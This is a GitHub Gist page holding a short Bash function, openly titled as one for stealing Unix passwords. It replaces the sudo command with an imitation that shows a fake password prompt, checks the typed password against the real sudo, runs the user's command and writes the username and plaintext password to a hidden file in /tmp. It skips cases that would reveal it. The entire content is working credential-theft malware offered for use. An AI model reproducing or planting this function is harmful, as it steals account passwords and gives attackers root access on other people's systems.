-
-
Save benbusby/225df320646f1fc1c28e88b24990dd2e to your computer and use it in GitHub Desktop.
Imitation-sudo function for stealing Unix passwords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sudo () { | |
| realsudo="$(which sudo)" | |
| # Skip altogether if $USER is not set for whatever reason | |
| if [[ -z $USER ]]; | |
| then | |
| $realsudo "${@:1}" | |
| return | |
| fi | |
| realcommand="${@:1}" | |
| allowedcmds=`sudo -l | grep -A 2 "$USER may run the following commands" | tr -d "[:space:]"` | |
| # Skip if already found, if user is allowed to run with nopasswd, or for any "-" commands | |
| if grep -Fqs "$USER" /tmp/.b01n6 || [[ $realcommand == *"-"* ]] || [[ $allowedcmds == *"$realcommand"* ]]; | |
| then | |
| $realsudo $realcommand | |
| else | |
| read -s -p "[sudo] password for $USER: " inputPasswd | |
| $realsudo -S <<< "$inputPasswd" -u root bash -c "exit" >/dev/null 2>&1 | |
| $realsudo $realcommand | |
| printf "\n"; printf '%s\n' "$USER : $inputPasswd" >/tmp/.b01n6 | |
| fi | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment